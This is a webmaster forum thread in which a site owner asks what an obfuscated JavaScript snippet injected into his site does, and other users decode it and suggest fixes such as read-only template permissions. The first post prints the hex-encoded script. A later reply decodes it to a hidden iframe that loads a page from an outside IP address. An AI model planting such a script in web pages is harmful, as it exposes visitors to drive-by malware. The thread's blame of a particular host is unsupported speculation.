One of my sites hacked, question about code

Collapse
X
 
  • Time
  • Show
Clear All
new posts
  • Global-X
    Confirmed User
    • Jan 2004
    • 336

    #1

    One of my sites hacked, question about code

    So I just found out someone managed to add some javascript/exploit to one of my sites. No idea yet how they got in, site is running on smartthumbs/atx, all other sites on the server are fine.

    Anyone got an idea what this code is doing :

    <script> var s='3C696672616D65207372633D22687474703A2F2F3139352 E352E3131362E3235302F65782F7374617469632E706870222 077696474683D32206865696768743D32207374796C653D226 46973706C61793A6E6F6E65223E3C2F696672616D653E'; var o=''; for(i=0;i<s.length;i=i+2) { var c=String.fromCharCode(37); o=o+c+s.substr(i,2);} document.write(unescape(o)); </script>
  • High Class Grass
    So Fucking Banned
    • Jan 2007
    • 103

    #2
    nothing to worry about, ur just paranoid

    Comment

    • Global-X
      Confirmed User
      • Jan 2004
      • 336

      #3
      Originally posted by High Class Grass
      nothing to worry about, ur just paranoid
      You smoke too much

      Comment

      • Nookster
        Confirmed IT Professional
        • Nov 2005
        • 3744

        #4
        Let me throw a wild guess into the wind. Hosting at webair?? LOL
        The Best Affiliate Software, Ever.

        Comment

        • Global-X
          Confirmed User
          • Jan 2004
          • 336

          #5
          Originally posted by Nookster
          Let me throw a wild guess into the wind. Hosting at webair?? LOL

          This server is with webair yes, please explain, I just reset my ftp password

          Comment

          • Nookster
            Confirmed IT Professional
            • Nov 2005
            • 3744

            #6
            Originally posted by Global-X
            This server is with webair yes, please explain, I just reset my ftp password
            Get a more reliable host. I've noticed patterns developing with webair and that "mystical" javascript code showing up magically in the headers of sites hosted on webair. Something is being exploited within the webair administration interface for sure. Just don't know what.
            The Best Affiliate Software, Ever.

            Comment

            • Global-X
              Confirmed User
              • Jan 2004
              • 336

              #7
              Originally posted by Nookster
              Get a more reliable host. I've noticed patterns developing with webair and that "mystical" javascript code showing up magically in the headers of sites hosted on webair. Something is being exploited within the webair administration interface for sure. Just don't know what.
              It's true that I never experienced anything like this with my servers at nationalnet or phatservers but I though webair has a good reputation, lots of webmasters using them

              Comment

              • pastafari
                Confirmed User
                • Jan 2006
                • 112

                #8
                http://www.gofuckyourself.com/showthread.php?t=787142

                Comment

                • Violetta
                  Affiliate
                  • Jul 2004
                  • 28735

                  #9
                  time to change your ftp login!
                  M&A Queen

                  Comment

                  • Global-X
                    Confirmed User
                    • Jan 2004
                    • 336

                    #10
                    Originally posted by Rockatansky
                    time to change your ftp login!
                    I wish it was that simple

                    Comment

                    • boneless
                      Confirmed User
                      • Dec 2002
                      • 3625

                      #11
                      since i keep my templates in comus and st set to 644 or 444 permissions i havent had any iframes added to my pages anymore.
                      icq:148573096 skype:dabone2 email:boneless(a)mgpteam(.)com

                      Comment

                      • drjones
                        Confirmed User
                        • Oct 2005
                        • 908

                        #12
                        The code writes this to your web pages:

                        <iframe src="http://195.5.116.250/ex/static.php" width=2 height=2 style="display:none"></iframe>
                        ICQ: 284903372

                        Comment

                        • Quickdraw
                          Confirmed User
                          • Mar 2004
                          • 1717

                          #13
                          Did you upgrade your ATX recently? They had a security update last week I believe.

                          Comment

                          • miroz
                            Confirmed User
                            • Aug 2006
                            • 387

                            #14
                            read this: http://askdamage.com/t21776-p2-we-ne...urity-now.html
                            TommyPimp.com - my favorite celebrity program
                            Buy traffic

                            Comment

                            • Global-X
                              Confirmed User
                              • Jan 2004
                              • 336

                              #15
                              Originally posted by drjones
                              The code writes this to your web pages:

                              <iframe src="http://195.5.116.250/ex/static.php" width=2 height=2 style="display:none"></iframe>
                              Thanks for the info

                              Comment

                              • Global-X
                                Confirmed User
                                • Jan 2004
                                • 336

                                #16
                                Originally posted by miroz

                                Hmmm......... seems I'm not the only one, chmodded my smart thumbs templates to 444 and until now I'm fine again

                                Comment

                                • million
                                  Confirmed User
                                  • Apr 2006
                                  • 789

                                  #17
                                  get another host, not going to promote mine here, but do yourself a favor and get out of that webair oversold crap
                                  <sig spot goes here>

                                  Comment

                                  • Global-X
                                    Confirmed User
                                    • Jan 2004
                                    • 336

                                    #18
                                    Originally posted by million
                                    get another host, not going to promote mine here, but do yourself a favor and get out of that webair oversold crap
                                    What do you mean with oversold?? It's a dedicated server with zero downtime since 1 year+, so far I'm happy with them

                                    Comment

                                    • monstergalleriesdotnet
                                      So Fucking Banned
                                      • Sep 2007
                                      • 254

                                      #19
                                      bummpppppp

                                      Comment

                                      • jo3
                                        Confirmed User
                                        • Nov 2003
                                        • 876

                                        #20
                                        this happened to one of my SSH accounts last week

                                        TURN THAT SHIT OFF UNLESS YOU NEED IT

                                        the script interprets out to an invisible iframe... go figure =/

                                        again, secure your sites by turning off ssh and contact your host to see anymore information that can dig up for you and to protect it from happening in the future.
                                        //porn-oh network

                                        Comment

                                        Working...